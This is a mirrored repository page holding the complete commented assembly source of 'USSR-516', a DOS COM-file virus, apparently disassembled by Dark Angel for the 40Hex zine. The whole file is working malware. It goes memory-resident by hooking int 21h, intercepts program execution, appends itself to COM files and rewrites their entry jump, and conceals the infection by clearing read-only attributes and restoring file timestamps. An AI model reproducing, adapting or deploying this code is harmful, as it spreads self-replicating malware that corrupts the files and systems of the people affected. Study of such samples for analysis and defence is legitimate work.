mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-31 23:45:27 +00:00
281 lines
13 KiB
NASM
281 lines
13 KiB
NASM
|
|
||
|
ussr516 segment byte public
|
||
|
assume cs:ussr516, ds:ussr516
|
||
|
org 100h
|
||
|
;Disassembled by Dark Angel of PHALCON/SKISM
|
||
|
;for 40Hex Number 7 Volume 2 Issue 3
|
||
|
stub: db 0e9h, 0, 0
|
||
|
db 0e9h, 1, 0, 0
|
||
|
;This is where the virus really begins
|
||
|
start:
|
||
|
push ax
|
||
|
call beginvir
|
||
|
|
||
|
orig4 db 0cdh, 20h, 0, 0
|
||
|
int30store db 0, 0, 0, 0 ;Actually it's int 21h
|
||
|
;entry point
|
||
|
int21store db 0, 0, 0, 0
|
||
|
|
||
|
beginvir: pop bp ;BP -> orig4
|
||
|
mov si,bp
|
||
|
mov di,103h
|
||
|
add di,[di-2] ;DI -> orig4
|
||
|
movsw ;restore original
|
||
|
movsw ;4 bytes of program
|
||
|
xor si,si
|
||
|
mov ds,si
|
||
|
les di,dword ptr ds:[21h*4]
|
||
|
mov [bp+8],di ;int21store
|
||
|
mov [bp+0Ah],es
|
||
|
lds di,dword ptr ds:[30h*4+1] ;Bug????
|
||
|
findmarker:
|
||
|
inc di
|
||
|
cmp word ptr [di-2],0E18Ah ;Find marker bytes
|
||
|
jne findmarker ;to the entry point
|
||
|
mov [bp+4],di ;and move to
|
||
|
mov [bp+6],ds ;int30store
|
||
|
mov ax,5252h ;Get list of lists
|
||
|
int 21h ;and also ID check
|
||
|
|
||
|
add bx,12h ;Already installed?
|
||
|
jz quitvir ;then exit
|
||
|
push bx
|
||
|
mov ah,30h ;Get DOS version
|
||
|
int 21h
|
||
|
|
||
|
pop bx ;bx = 12, ptr to 1st
|
||
|
;disk buffer
|
||
|
cmp al,3
|
||
|
je handlebuffer ;if DOS 3
|
||
|
ja handleDBHCH ;if > DOS 3
|
||
|
inc bx ;DOS 2.X, offset is 13
|
||
|
handlebuffer:
|
||
|
push ds
|
||
|
push bx
|
||
|
lds bx,dword ptr [bx] ;Get seg:off of buffer
|
||
|
inc si
|
||
|
pop di
|
||
|
pop es ;ES:DI->seg:off buff
|
||
|
mov ax,[bx] ;ptr to next buffer
|
||
|
cmp ax,0FFFFh ;least recently used?
|
||
|
jne handlebuffer ;if not, go find it
|
||
|
cmp si,3
|
||
|
jbe quitvir
|
||
|
stosw
|
||
|
stosw
|
||
|
jmp short movetobuffer
|
||
|
handleDBHCH: ;Disk Buffer Hash Chain Head array
|
||
|
lds si,dword ptr [bx] ;ptr to disk buffer
|
||
|
lodsw ;info
|
||
|
lodsw ;seg of disk buffer
|
||
|
;hash chain head array
|
||
|
inc ax ;second entry
|
||
|
mov ds,ax
|
||
|
xor bx,bx
|
||
|
mov si,bx
|
||
|
lodsw ;EMS page, -1 if not
|
||
|
;in EMS
|
||
|
xchg ax,di ;save in di
|
||
|
lodsw ;ptr to least recently
|
||
|
;used buffer
|
||
|
mov [di+2],ax ;change disk buffer
|
||
|
;backward offset to
|
||
|
;least recently used
|
||
|
xchg ax,di ;restore EMS page
|
||
|
mov [di],ax ;set to least recently
|
||
|
movetobuffer: ;used
|
||
|
mov di,bx
|
||
|
push ds
|
||
|
pop es ;ES:DI -> disk buffer
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov cx,108h
|
||
|
lea si,[bp-4] ;Copy from start
|
||
|
rep movsw
|
||
|
mov ds,cx ;DS -> interrupt table
|
||
|
mov word ptr ds:[4*21h],0BCh ;New interrupt handler
|
||
|
mov word ptr ds:[4*21h+2],es ;at int21
|
||
|
quitvir:
|
||
|
push cs ;CS = DS = ES
|
||
|
pop es
|
||
|
push es
|
||
|
pop ds
|
||
|
pop ax
|
||
|
mov bx,ax
|
||
|
mov si, 100h ;set up stack for
|
||
|
push si ;the return to the
|
||
|
retn ;original program
|
||
|
int24:
|
||
|
mov al,3 ;Ignore all errors
|
||
|
iret
|
||
|
tickstore db 3 ;Why???
|
||
|
buffer db 3, 0, 9, 0
|
||
|
|
||
|
int21:
|
||
|
pushf
|
||
|
cli ;CP/M style call entry
|
||
|
call dword ptr cs:[int30store-start]
|
||
|
retn ;point of int 21h
|
||
|
|
||
|
int21DSDX: ;For int 21h calls
|
||
|
push ds ;with
|
||
|
lds dx,dword ptr [bp+2] ;DS:DX -> filename
|
||
|
call int21
|
||
|
pop ds
|
||
|
retn
|
||
|
|
||
|
cmp ax,4B00h ;Execute
|
||
|
je Execute
|
||
|
cmp ax,5252h ;ID check
|
||
|
je CheckID
|
||
|
cmp ah,30h ;DOS Version
|
||
|
je DosVersion
|
||
|
callorig21: ;Do other calls
|
||
|
jmp dword ptr cs:[int21store-start]
|
||
|
DosVersion: ;Why????? ;DOS Version
|
||
|
dec byte ptr cs:[tickstore-start]
|
||
|
jnz callorig21 ;Continue if not 0
|
||
|
push es
|
||
|
xor ax,ax
|
||
|
push ax
|
||
|
mov es,ax
|
||
|
mov al,es:[46Ch] ; 40h:6Ch = Timer ticks
|
||
|
; since midnight
|
||
|
and al,7 ; MOD 15
|
||
|
inc ax
|
||
|
inc ax
|
||
|
mov cs:[tickstore-start],al ;# 2-17
|
||
|
pop ax
|
||
|
pop es
|
||
|
iret
|
||
|
CheckID: ;ID Check
|
||
|
mov bx,0FFEEh ;FFEEh = -12h
|
||
|
iret
|
||
|
Execute: ;Execute
|
||
|
push ax ;Save registers
|
||
|
push cx
|
||
|
push es
|
||
|
push bx
|
||
|
push ds ;DS:DX -> filename
|
||
|
push dx ;save it on stack
|
||
|
push bp
|
||
|
mov bp,sp ;Set up stack frame
|
||
|
sub sp,0Ah ;Temporary variables
|
||
|
;[bp-A] = attributes
|
||
|
;[bp-8] = int 24 off
|
||
|
;[bp-6] = int 24 seg
|
||
|
;[bp-4] = file time
|
||
|
;[bp-2] = file date
|
||
|
sti
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov ax,3301h ;Turn off ^C check
|
||
|
xor dl,dl ;(never turn it back
|
||
|
call int21 ; on. Bug???)
|
||
|
mov ax,3524h ;Get int 24h
|
||
|
call int21 ;(Critical error)
|
||
|
mov [bp-8],bx
|
||
|
mov [bp-6],es
|
||
|
mov dx,int24-start
|
||
|
mov ax,2524h ;Set to new one
|
||
|
call int21
|
||
|
mov ax,4300h ;Get attributes
|
||
|
call int21DSDX
|
||
|
jnc continue
|
||
|
doneinfect:
|
||
|
mov ax,2524h ;Restore crit error
|
||
|
lds dx,dword ptr [bp-8] ;handler
|
||
|
call int21
|
||
|
cli
|
||
|
mov sp,bp
|
||
|
pop bp
|
||
|
pop dx
|
||
|
pop ds
|
||
|
pop bx
|
||
|
pop es
|
||
|
pop cx
|
||
|
pop ax
|
||
|
jmp short callorig21 ;Call orig handler
|
||
|
continue:
|
||
|
mov [bp-0Ah],cx ;Save attributes
|
||
|
test cl,1 ;Check if r/o????
|
||
|
jz noclearattr
|
||
|
xor cx,cx
|
||
|
mov ax,4301h ;Clear attributes
|
||
|
call int21DSDX ;Filename in DS:DX
|
||
|
jc doneinfect ;Quit on error
|
||
|
noclearattr:
|
||
|
mov ax,3D02h ;Open read/write
|
||
|
call int21DSDX ;Filename in DS:DX
|
||
|
jc doneinfect ;Exit if error
|
||
|
mov bx,ax
|
||
|
mov ax,5700h ;Save time/date
|
||
|
call int21
|
||
|
mov [bp-4],cx
|
||
|
mov [bp-2],dx
|
||
|
mov dx,buffer-start
|
||
|
mov cx,4
|
||
|
mov ah,3Fh ;Read 4 bytes to
|
||
|
call int21 ;buffer
|
||
|
jc quitinf
|
||
|
cmp byte ptr ds:[buffer-start],0E9h;Must start with 0E9h
|
||
|
jne quitinf ;Otherwise, quit
|
||
|
mov dx,word ptr ds:[buffer+1-start];dx = jmploc
|
||
|
dec dx
|
||
|
xor cx,cx
|
||
|
mov ax,4201h ;go there
|
||
|
call int21
|
||
|
mov ds:[buffer-start],ax ;new location offset
|
||
|
mov dx,orig4-start
|
||
|
mov cx,4
|
||
|
mov ah,3Fh ;Read 4 bytes there
|
||
|
call int21
|
||
|
mov dx,ds:[orig4-start]
|
||
|
cmp dl,0E9h ;0E9h means we might
|
||
|
jne infect ;already be there
|
||
|
mov ax,ds:[orig4+2-start] ;continue checking
|
||
|
add al,dh ;to see if we really
|
||
|
sub al,ah ;are there.
|
||
|
jz quitinf
|
||
|
infect:
|
||
|
xor cx,cx
|
||
|
mov dx,cx
|
||
|
mov ax,4202h ;Go to EOF
|
||
|
call int21
|
||
|
mov ds:[buffer+2-start],ax ;save filesize
|
||
|
mov cx,204h
|
||
|
mov ah,40h ;Write virus
|
||
|
call int21
|
||
|
jc quitinf ;Exit if error
|
||
|
sub cx,ax
|
||
|
jnz quitinf
|
||
|
mov dx,ds:[buffer-start]
|
||
|
mov ax,ds:[buffer+2-start]
|
||
|
sub ax,dx
|
||
|
sub ax,3 ;AX->jmp offset
|
||
|
mov word ptr ds:[buffer+1-start],ax;Set up buffer
|
||
|
mov byte ptr ds:[buffer-start],0E9h;code the jmp
|
||
|
add al,ah
|
||
|
mov byte ptr ds:[buffer+3-start],al
|
||
|
mov ax,4200h ;Rewind to jmploc
|
||
|
call int21
|
||
|
mov dx, buffer-start
|
||
|
mov cx,4 ;Write in the jmp
|
||
|
mov ah,40h
|
||
|
call int21
|
||
|
quitinf:
|
||
|
mov cx,[bp-4]
|
||
|
mov dx,[bp-2]
|
||
|
mov ax,5701h ;Restore date/time
|
||
|
call int21
|
||
|
mov ah,3Eh ;Close file
|
||
|
call int21
|
||
|
mov cx,[bp-0Ah] ;Restore attributes
|
||
|
mov ax,4301h
|
||
|
call int21DSDX
|
||
|
jmp doneinfect ;Return
|
||
|
ussr516 ends
|
||
|
end stub
|
||
|
|
||
|
|